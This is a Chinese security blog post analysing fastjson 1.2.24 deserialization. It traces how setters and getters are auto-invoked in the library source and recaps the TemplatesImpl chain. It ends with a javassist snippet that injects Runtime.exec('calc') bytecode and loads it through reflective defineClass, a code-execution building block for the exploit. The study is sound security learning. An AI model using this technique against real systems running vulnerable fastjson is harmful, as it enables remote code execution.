<!DOCTYPE html>
<html lang="zh-CN" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="Okaytc" />
  <meta name="description" content="生活 健身 学习 沉淀" />
  
  
  <title>
    
      java安全-fastjson及其TemplatesImpl链学习与分析 
      
      
      |
    
     Okaytc
  </title>

  
    <link rel="apple-touch-icon" href="/images/head-2.jpg">
    <link rel="icon" href="/images/head.jpg">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  
    
<link rel="stylesheet" href="/css/figcaption/mac-block.css">

  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 6.3.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/head-2.jpg" alt="">
      
    </a>
    <div class="nickname"><a href="/">Okaytc</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">主页</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">文章</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">标签</a>
        </li>
      
        <li class="nav-item" data-path="/friends/">
          <a href="/friends/">友链</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">关于</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">java安全-fastjson及其TemplatesImpl链学习与分析</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
          2023-01-04 16:15:00
        </span>
        
              <span class="post-tags">
                <i class="iconfont icon-tags mr-10" title="标签"></i>
                
                <span class="span--tag mr-8">
                  <a href="/tags/Java%E5%AE%89%E5%85%A8/" title="Java安全">
                    #Java安全
                  </a>
                </span>
                
                <span class="span--tag mr-8">
                  <a href="/tags/java%E5%88%A9%E7%94%A8%E9%93%BE/" title="java利用链">
                    #java利用链
                  </a>
                </span>
                
              </span>
          
      </div>
      <div class="markdown-body">
        <h1 id="0x00、前言"><a href="#0x00、前言" class="headerlink" title="0x00、前言"></a>0x00、前言</h1><p>本文学习fastjson以及在1.2.24版本下的TemplatesImpl链利用，学习下分析思路，尽量理解漏洞在源码上的触发过程。</p>
<h1 id="0x01、fastjson描述"><a href="#0x01、fastjson描述" class="headerlink" title="0x01、fastjson描述"></a>0x01、fastjson描述</h1><p>fastjson是阿里巴巴的开源JSON解析库，它可以解析JSON格式的字符串，支持将Java Bean序列化为JSON字符串，也可以从JSON字符串反序列化到JavaBean。<br>官方地址：<a target="_blank" rel="noopener" href="https://github.com/alibaba/fastjson">https://github.com/alibaba/fastjson</a><br>官方中文地址：<a target="_blank" rel="noopener" href="https://github.com/alibaba/fastjson/wiki/Quick-Start-CN">https://github.com/alibaba/fastjson/wiki/Quick-Start-CN</a></p>
<p>优点：</p>
<ul>
<li>性能速度快</li>
<li>使用广泛</li>
<li>测试完备（虽然现在各版本爆出来的问题有点多）</li>
<li>使用简单</li>
<li>功能完备</li>
</ul>
<p>格式跟jackson很像，区别jackson数据要求比较严格，其中提交的数据只能为对应Javabean的key，不能添加多余不在javabean的key进行提交，因此会报错，而fastjson不会</p>
<p>新建maven项目，然后环境添加：<br>直接添加对应版本到maven依赖即可</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line">&lt;dependencies&gt;</span><br><span class="line">    &lt;dependency&gt;</span><br><span class="line">        &lt;groupId&gt;com.alibaba&lt;/groupId&gt;</span><br><span class="line">        &lt;artifactId&gt;fastjson&lt;/artifactId&gt;</span><br><span class="line">        &lt;version&gt;<span class="number">1.2</span><span class="number">.24</span>&lt;/version&gt;</span><br><span class="line">    &lt;/dependency&gt;</span><br><span class="line">&lt;/dependencies&gt;</span><br></pre></td></tr></table></figure>
<p><img src="/posts/ad3be047/fj1-1.png" title="添加依赖"></p>
<h1 id="0x02、fastjson简单使用"><a href="#0x02、fastjson简单使用" class="headerlink" title="0x02、fastjson简单使用"></a>0x02、fastjson简单使用</h1><p>主要学习序列化和反序列化接口<br>简单使用：<br>创建基础实例类People类</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">People</span> &#123;</span><br><span class="line">    <span class="keyword">private</span> String name;</span><br><span class="line">    <span class="keyword">public</span> <span class="title function_">People</span><span class="params">()</span>&#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;调用People类构造方法&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">setName</span><span class="params">(String name)</span>&#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;调用了setName方法&quot;</span>);</span><br><span class="line">        <span class="built_in">this</span>.name=name;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">getName</span><span class="params">()</span>&#123;</span><br><span class="line">        System.out.println(<span class="string">&quot;调用了getName方法&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> name;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<h2 id="序列化-toJSONString"><a href="#序列化-toJSONString" class="headerlink" title="序列化-toJSONString()"></a>序列化-toJSONString()</h2><p>还有一些其它的序列化方法</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="comment">// 将Java对象序列化为JSON字符串，支持各种各种Java基本类型和JavaBean</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> String <span class="title function_">toJSONString</span><span class="params">(Object object, SerializerFeature... features)</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 将Java对象序列化为JSON字符串，返回JSON字符串的utf-8 bytes</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="type">byte</span>[] toJSONBytes(Object object, SerializerFeature... features);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 将Java对象序列化为JSON字符串，写入到Writer中</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">writeJSONString</span><span class="params">(Writer writer, </span></span><br><span class="line"><span class="params">                                   Object object, </span></span><br><span class="line"><span class="params">                                   SerializerFeature... features)</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 将Java对象序列化为JSON字符串，按UTF-8编码写入到OutputStream中</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="type">int</span> <span class="title function_">writeJSONString</span><span class="params">(OutputStream os,</span></span><br><span class="line"><span class="params">                                        Object object,</span></span><br><span class="line"><span class="params">                                        SerializerFeature... features)</span>;</span><br></pre></td></tr></table></figure>

<p>序列化toJSONString()的使用：<br><code>JSON.toJSONString(Class class)</code><br><code>JSON.toJSONString(Class class,SerializerFeature ...)</code>可以使用SerializerFeature.WriteClassName参数将类名加到序列化json字段的@type中</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception&#123;</span><br><span class="line">        People people=<span class="keyword">new</span> <span class="title class_">People</span>();</span><br><span class="line">        people.setName(<span class="string">&quot;张三&quot;</span>);</span><br><span class="line">        Object fj=JSON.toJSONString(people);</span><br><span class="line">        System.out.println(fj);</span><br><span class="line">        Object fj2=JSON.toJSONString(people, SerializerFeature.WriteClassName);</span><br><span class="line">        System.out.println(fj2);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p><img src="/posts/ad3be047/fj1-2.png" title="toJSONString()的使用"></p>
<h2 id="反序列化-parseObject-、parse-、parseArray"><a href="#反序列化-parseObject-、parse-、parseArray" class="headerlink" title="反序列化-parseObject()、parse()、parseArray()"></a>反序列化-parseObject()、parse()、parseArray()</h2><p>还有一些其他不同参数的使用方法</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="comment">// 将JSON字符串反序列化为JavaBean</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> &lt;T&gt; T <span class="title function_">parseObject</span><span class="params">(String jsonStr, </span></span><br><span class="line"><span class="params">                                Class&lt;T&gt; clazz, </span></span><br><span class="line"><span class="params">                                Feature... features)</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 将JSON字符串反序列化为JavaBean</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> &lt;T&gt; T <span class="title function_">parseObject</span><span class="params">(<span class="type">byte</span>[] jsonBytes,  // UTF-<span class="number">8</span>格式的JSON字符串</span></span><br><span class="line"><span class="params">                                Class&lt;T&gt; clazz, </span></span><br><span class="line"><span class="params">                                Feature... features)</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 将JSON字符串反序列化为泛型类型的JavaBean</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> &lt;T&gt; T <span class="title function_">parseObject</span><span class="params">(String text, </span></span><br><span class="line"><span class="params">                                TypeReference&lt;T&gt; type, </span></span><br><span class="line"><span class="params">                                Feature... features)</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 将JSON字符串反序列为JSONObject</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> JSONObject <span class="title function_">parseObject</span><span class="params">(String text)</span>;</span><br></pre></td></tr></table></figure>

<p>反序列化parseObject()、parse()用法<br><code>JSON.parseObject()</code></p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception&#123;</span><br><span class="line">        People people=<span class="keyword">new</span> <span class="title class_">People</span>();</span><br><span class="line">        <span class="comment">//第一种方式</span></span><br><span class="line">        String parse=<span class="string">&quot;&#123;\&quot;name\&quot;:\&quot;李四\&quot;&#125;&quot;</span>;</span><br><span class="line">        Object parfj=JSON.parseObject(parse,People.class);</span><br><span class="line">        System.out.println(parfj);</span><br><span class="line">        <span class="comment">//第二种方式效果同上</span></span><br><span class="line">        String parse2=<span class="string">&quot;&#123;\&quot;@type\&quot;:\&quot;com.test.fastjson.People\&quot;,\&quot;name\&quot;:\&quot;李四\&quot;&#125;&quot;</span>;</span><br><span class="line">        Object parfj2=JSON.parseObject(parse2);</span><br><span class="line">        System.out.println(parfj2);</span><br><span class="line">        <span class="comment">//第三种方式</span></span><br><span class="line">        String parse2=<span class="string">&quot;&#123;\&quot;@type\&quot;:\&quot;com.test.fastjson.People\&quot;,\&quot;name\&quot;:\&quot;李四\&quot;&#125;&quot;</span>;</span><br><span class="line">        Object parfj2=JSON.parse(parse2);</span><br><span class="line">        System.out.println(parfj2);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p><img src="/posts/ad3be047/fj1-3.png" title="反序列化的使用"></p>
<ul>
<li>parseObject()方法，需要设置第二个参数(Class class)将序列化数据读取应用到对应类里，否则会返回JSON对象</li>
<li>parse()方法是直接将序列化数据应用到@type声明的类中，如果不声明@type变量，则会返回JSON对象。</li>
<li>parseArray()方法就是源数据是集合的形式（即[]中的内容）</li>
</ul>
<p>另外一些使用方法直接参考中文手册即可<br><a target="_blank" rel="noopener" href="https://www.w3cschool.cn/fastjson/">https://www.w3cschool.cn/fastjson/</a></p>
<h2 id="getter-x2F-setter自动调用"><a href="#getter-x2F-setter自动调用" class="headerlink" title="getter&#x2F;setter自动调用"></a>getter&#x2F;setter自动调用</h2><p>在使用fastjson中，发现</p>
<ul>
<li><code>JSON.parseObject(parse2)</code>方法会自动调用目标类的构造方法、get方法和set方法。</li>
<li><code>JSON.parseObject(parse2,People.class)</code>和<code>JSON.parse(parse2)</code>方法只会调用目标类的构造方法和set方法</li>
</ul>
<h3 id="get方法调用"><a href="#get方法调用" class="headerlink" title="get方法调用"></a>get方法调用</h3><p><code>parseObject(parse2)</code>方法中会通过反射读取目标元素的getter获取值并存储在hashmap中<br><img src="/posts/ad3be047/fj1-8.png" title="parseObject方法"><br><img src="/posts/ad3be047/fj1-4.png" title="get方法调用"><br><img src="/posts/ad3be047/fj1-5.png" title="get方法调用"><br><img src="/posts/ad3be047/fj1-9.png" title="get方法调用"><br><img src="/posts/ad3be047/fj1-6.png" title="get方法调用"></p>
<h3 id="set方法、构造方法调用"><a href="#set方法、构造方法调用" class="headerlink" title="set方法、构造方法调用"></a>set方法、构造方法调用</h3><p>但在setter调用的调试中，只追到下图的包，通过deserialze()方法反射获取成员值，循环读取但是无法抓到每个获取方法的过程<br><img src="/posts/ad3be047/fj1-7.png" title="setter"></p>
<h3 id="getter-x2F-setter获取"><a href="#getter-x2F-setter获取" class="headerlink" title="getter&#x2F;setter获取"></a>getter&#x2F;setter获取</h3><p>上面提到在调用对应get或者set方法时，通过getter&#x2F;setter获取对应方法，然后直接调用在getter&#x2F;setter获取对应的成员值反序列化中的获取getter&#x2F;setter前的调用栈大体如下，没找到前面调用过程的文章，瞎跟了好一会，比较容易跟丢，后面按我理解跟出来的调用情况，用图展示的话拉的比较长，就用调用链形式展示，以反序列化调试展示</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line">JSON.parseObject(String text)</span><br><span class="line">    -&gt;parse(text)</span><br><span class="line">        -&gt;parse(text, DEFAULT_PARSER_FEATURE)</span><br><span class="line">            -&gt;DefaultJSONParser.parse()</span><br><span class="line">                -&gt;parse(Object fieldName)</span><br><span class="line">                    -&gt;parseObject(object, fieldName)</span><br><span class="line">                        -&gt;TypeUtils.loadClass(typeName, config.getDefaultClassLoader()) <span class="comment">//通过type值反射获取类</span></span><br><span class="line">                        -&gt;ParserConfig.getDeserializer(Clazz)</span><br><span class="line">                            -&gt;getDeserializer(Class&lt;?&gt; clazz, Type type)</span><br><span class="line">                                -&gt;createJavaBeanDeserializer(clazz, type)</span><br><span class="line">                                    -&gt;JavaBeanInfo.build(clazz, type, propertyNamingStrategy)</span><br></pre></td></tr></table></figure>

<p>进入JavaBeanInfo.build()方法查看getter&#x2F;setter的设置情况<br>首先通过反射获取Clazz类的属性、方法、构造方法<br><img src="/posts/ad3be047/fj1-10.png" title="反射调用"></p>
<p>获取后，先是判断构造器是否为空，如果为空，则判断该类是否是接口或者抽象类，如果是的话，然后创建JSNOcreator注解，（底层源码没注解看着还是费劲好些流程不是特别明白）</p>
<p><img src="/posts/ad3be047/fj1-11.png" title="构造器判断"></p>
<h4 id="setter构建"><a href="#setter构建" class="headerlink" title="setter构建"></a>setter构建</h4><p>经过前面的一些判断，再到下面的setter构建，循环获取反射里的方法名</p>
<p><img src="/posts/ad3be047/fj1-12.png" title="getter/setter构建"></p>
<p>会经过几个条件判断:<br>条件判断，方法名长度不能小于4</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> (methodName.length() &lt; <span class="number">4</span>) &#123;</span><br><span class="line">        <span class="keyword">continue</span>;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>条件判断，方法不能是静态方法</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> (Modifier.isStatic(method.getModifiers())) &#123;</span><br><span class="line">    <span class="keyword">continue</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>条件判断，方法的返回类型必须是void类型或者返回方法本身。主要是作用筛选是不是set方法，get方法会返回字符串就符合下面的判断</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> (!(method.getReturnType().equals(Void.TYPE) || method.getReturnType().equals(method.getDeclaringClass()))) &#123;</span><br><span class="line">        <span class="keyword">continue</span>;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p>条件判断，方法的参数个数必须为1个</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line">Class&lt;?&gt;[] types = method.getParameterTypes();</span><br><span class="line"><span class="keyword">if</span> (types.length != <span class="number">1</span>) &#123;</span><br><span class="line">    <span class="keyword">continue</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>条件判断，方法名开头必须是set开头</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> (!methodName.startsWith(<span class="string">&quot;set&quot;</span>)) &#123; <span class="comment">// TODO &quot;set&quot;的判断放在 JSONField 注解后面，意思是允许非 setter 方法标记 JSONField 注解？</span></span><br><span class="line">    <span class="keyword">continue</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>条件判断，判断TypeUtils.compatibleWithJavaBean是否开起，compatibleWithJavaBean为false表示首字母小写</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">if</span> (TypeUtils.compatibleWithJavaBean) &#123;</span><br><span class="line">    propertyName = TypeUtils.decapitalize(methodName.substring(<span class="number">3</span>));</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    propertyName = Character.toLowerCase(methodName.charAt(<span class="number">3</span>)) + methodName.substring(<span class="number">4</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>条件判断，判断set后面的字母</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="comment">//判断第四个字符是否是以“_”或者“f”</span></span><br><span class="line">&#125; <span class="keyword">else</span> <span class="keyword">if</span> (c3 == <span class="string">&#x27;_&#x27;</span>) &#123;</span><br><span class="line">    propertyName = methodName.substring(<span class="number">4</span>);</span><br><span class="line">&#125; <span class="keyword">else</span> <span class="keyword">if</span> (c3 == <span class="string">&#x27;f&#x27;</span>) &#123;</span><br><span class="line">    propertyName = methodName.substring(<span class="number">3</span>);</span><br><span class="line">    <span class="comment">//如果不是以上情况，就判断方法名长度是否大于5并且方法名的第五个字符是否是大写</span></span><br><span class="line">&#125; <span class="keyword">else</span> <span class="keyword">if</span> (methodName.length() &gt;= <span class="number">5</span> &amp;&amp; Character.isUpperCase(methodName.charAt(<span class="number">4</span>))) &#123;</span><br><span class="line">    propertyName = TypeUtils.decapitalize(methodName.substring(<span class="number">3</span>));</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">continue</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>通过上面的筛选获取截选后的字段的属性值，如果属性值不存在或者类型为boolean类型，就对其变量名前面加上is拼接，再查询拼接后的字段的属性值</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="type">Field</span> <span class="variable">field</span> <span class="operator">=</span> TypeUtils.getField(clazz, propertyName, declaredFields);</span><br><span class="line"><span class="keyword">if</span> (field == <span class="literal">null</span> &amp;&amp; types[<span class="number">0</span>] == <span class="type">boolean</span>.class) &#123;</span><br><span class="line">    <span class="type">String</span> <span class="variable">isFieldName</span> <span class="operator">=</span> <span class="string">&quot;is&quot;</span> + Character.toUpperCase(propertyName.charAt(<span class="number">0</span>)) + propertyName.substring(<span class="number">1</span>);</span><br><span class="line">    field = TypeUtils.getField(clazz, isFieldName, declaredFields);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>最后将符合条件的添加入fieildList中</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line">add(fieldList, <span class="keyword">new</span> <span class="title class_">FieldInfo</span>(propertyName, method, field, clazz, type, ordinal, serialzeFeatures, parserFeatures,</span><br><span class="line">                                         annotation, fieldAnnotation, <span class="literal">null</span>));</span><br></pre></td></tr></table></figure>

<p>总结必须满足的条件就是：</p>
<ul>
<li>方法名长度不能小于4</li>
<li>方法不能是静态方法</li>
<li>方法的返回类型必须是void类型或者返回方法本身</li>
<li>方法的参数个数必须为1个</li>
<li>方法名开头必须是set开头</li>
</ul>
<h4 id="getter构建"><a href="#getter构建" class="headerlink" title="getter构建"></a>getter构建</h4><p><img src="/posts/ad3be047/fj1-13.png" title="getter构建"></p>
<p>流程差不多<br>条件判断，方法名长度不能小于4</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> (methodName.length() &lt; <span class="number">4</span>) &#123;</span><br><span class="line">        <span class="keyword">continue</span>;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>条件判断，方法不能是静态方法</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> (Modifier.isStatic(method.getModifiers())) &#123;</span><br><span class="line">    <span class="keyword">continue</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>条件判断，方法名必须以”get”开头，并且方法名的第四个字母必须是大写</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> (methodName.startsWith(<span class="string">&quot;get&quot;</span>) &amp;&amp; Character.isUpperCase(methodName.charAt(<span class="number">3</span>))) &#123;</span><br><span class="line">    <span class="keyword">if</span> (method.getParameterTypes().length != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">continue</span>;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>条件判断，方法的返回类型必须继承（Collection、Map、AtomicBoolean、AtomicLong）四个类的其中一种</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> (Collection.class.isAssignableFrom(method.getReturnType()) <span class="comment">//</span></span><br><span class="line">        || Map.class.isAssignableFrom(method.getReturnType()) <span class="comment">//</span></span><br><span class="line">        || AtomicBoolean.class == method.getReturnType() <span class="comment">//</span></span><br><span class="line">        || AtomicInteger.class == method.getReturnType() <span class="comment">//</span></span><br><span class="line">        || AtomicLong.class == method.getReturnType() <span class="comment">//</span></span><br><span class="line">    ) &#123;</span><br></pre></td></tr></table></figure>

<p>然后把满足条件的放进fieldinfo中</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line">add(fieldList, <span class="keyword">new</span> <span class="title class_">FieldInfo</span>(propertyName, method, <span class="literal">null</span>, clazz, type, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, annotation, <span class="literal">null</span>, <span class="literal">null</span>));</span><br></pre></td></tr></table></figure>

<p>接着获取方法的是否存在JSONField的注解方法，类似下图，判断该类是否存在JSONField的注解方法，并且是否可以反序列化，反序列化设置默认为true<br><img src="/posts/ad3be047/fj1-15.png" title="beaninfo"></p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="type">JSONField</span> <span class="variable">annotation</span> <span class="operator">=</span> method.getAnnotation(JSONField.class);</span><br><span class="line">    <span class="keyword">if</span> (annotation != <span class="literal">null</span> &amp;&amp; annotation.deserialize()) &#123;</span><br><span class="line">        <span class="keyword">continue</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">if</span> (annotation != <span class="literal">null</span> &amp;&amp; annotation.name().length() &gt; <span class="number">0</span>) &#123;</span><br><span class="line">        propertyName = annotation.name();</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        propertyName = Character.toLowerCase(methodName.charAt(<span class="number">3</span>)) + methodName.substring(<span class="number">4</span>);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>然后获取字段信息，查看该注释方法名在fieildList中否存在</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="type">FieldInfo</span> <span class="variable">fieldInfo</span> <span class="operator">=</span> getField(fieldList, propertyName);</span><br><span class="line">    <span class="keyword">if</span> (fieldInfo != <span class="literal">null</span>) &#123;</span><br><span class="line">        <span class="keyword">continue</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (propertyNamingStrategy != <span class="literal">null</span>) &#123;</span><br><span class="line">        propertyName = propertyNamingStrategy.translate(propertyName);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>满足上面条件就将信息存进fieildList中</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line">add(fieldList, <span class="keyword">new</span> <span class="title class_">FieldInfo</span>(propertyName, method, <span class="literal">null</span>, clazz, type, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, annotation, <span class="literal">null</span>, <span class="literal">null</span>));</span><br></pre></td></tr></table></figure>

<p>总结必须满足的条件就是：</p>
<ul>
<li>方法名长度不能小于4</li>
<li>方法不能是静态方法</li>
<li>方法名开头必须是get开头</li>
<li>方法的返回类型必须继承（Collection、Map、AtomicBoolean、AtomicLong）四个类的其中一种</li>
</ul>
<p>最后通过返回javaBeanInfo将上面的fieldinfo一起放进beaninfo中</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">return</span> <span class="keyword">new</span> <span class="title class_">JavaBeanInfo</span>(clazz, builderClass, defaultConstructor, <span class="literal">null</span>, <span class="literal">null</span>, buildMethod, jsonType, fieldList);</span><br></pre></td></tr></table></figure>
<p><img src="/posts/ad3be047/fj1-14.png" title="beaninfo"></p>
<h1 id="0x03、TemplatesImpl知识回顾"><a href="#0x03、TemplatesImpl知识回顾" class="headerlink" title="0x03、TemplatesImpl知识回顾"></a>0x03、TemplatesImpl知识回顾</h1><p>TemplatesImpl在cc2链学习中涉及到，这里直接引用cc2分析的部分吧</p>
<h2 id="ClassLoader-defineClass"><a href="#ClassLoader-defineClass" class="headerlink" title="ClassLoader#defineClass"></a>ClassLoader#defineClass</h2><p>ClassLoader为类加载器，可以将字节码文件(.class文件)，通过loadClass函数加载类名，返回一个Class对象，同时ClassLoader类下面存在defineClass方法，可以将byte[]字节数组信息还原成一个Class对象，在学javassist中，了解到javassist可以动态生成字节码文件，包括了一些恶意代码文件，可进而通过ClassLoader类加载器将这些恶意的字节码文件转化为java类进行调用，达到执行恶意代码的目的</p>
<p>其中类加载阶段：</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line">ClassLoader#loadClass（类加载，从类缓或父加载器等位置寻找类）</span><br><span class="line">    ——&gt; ClassLoader#findClass（寻找类，通过URL制定的方式加载字节码）</span><br><span class="line">        ——&gt; ClassLoader#defineClass（定义类，通过获取的字节码转换成类对象）</span><br></pre></td></tr></table></figure>

<p>由于ClassLoader#defineClass方法为protect修饰，因此可通过反射进行调用</p>
<p>简单实现</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line"></span><br><span class="line">        ClassPool pool2=ClassPool.getDefault();</span><br><span class="line"></span><br><span class="line">        <span class="comment">//创建新类Exp2</span></span><br><span class="line">        CtClass ct=pool2.makeClass(<span class="string">&quot;People2&quot;</span>);</span><br><span class="line"></span><br><span class="line">        <span class="comment">//创建构造函数</span></span><br><span class="line">        CtConstructor cons=ct.makeClassInitializer();</span><br><span class="line">        <span class="comment">//向构造函数插入字节码</span></span><br><span class="line">        cons.insertBefore(<span class="string">&quot;java.lang.Runtime.getRuntime().exec(\&quot;calc\&quot;);&quot;</span>);</span><br><span class="line">        <span class="comment">//ct.writeFile(&quot;./&quot;);</span></span><br><span class="line"></span><br><span class="line">        <span class="comment">//生成字节码</span></span><br><span class="line">        <span class="type">byte</span>[] bt=ct.toBytecode();</span><br><span class="line"></span><br><span class="line">        <span class="comment">//通过反射调用ClassLoader#defineClass</span></span><br><span class="line">        Method define=ClassLoader.class.getDeclaredMethod(<span class="string">&quot;defineClass&quot;</span>, String.class ,<span class="type">byte</span>[].class, <span class="type">int</span>.class, <span class="type">int</span>.class);</span><br><span class="line">        define.setAccessible(<span class="literal">true</span>);</span><br><span class="line">        Class cla=(Class)define.invoke(ClassLoader.getSystemClassLoader(),<span class="string">&quot;People2&quot;</span>,bt,<span class="number">0</span>,bt.length);</span><br><span class="line">        cla.newInstance();</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p><img src="/posts/ad3be047/cc2-25.png" title="defineClass实现"></p>
